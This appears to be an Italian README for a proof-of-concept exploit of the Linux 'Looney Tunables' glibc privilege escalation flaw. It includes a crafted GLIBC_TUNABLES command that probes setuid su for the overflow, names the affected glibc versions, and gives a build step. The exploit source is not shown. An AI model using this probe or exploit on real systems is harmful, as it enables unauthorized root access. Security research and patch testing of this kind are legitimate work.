
Questo è un PoC (Proof Of Concept) per la vulnerabilità di escalation dei privilegi di Linux "Looney Tunables". Si basa su questo PoC. Un grande ringraziamento a leesh3288. Qui puoi trovare un'analisi molto dettagliata, e qui puoi vedere un video molto interessante di IppSec.
Verifica se è vulnerabile
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Vale la pena notare che le versioni vulnerabili di glibc, inclusa questa, sono dalla 2.35-0ubuntu3.3 in giù.
Esegui l'exploit
$ make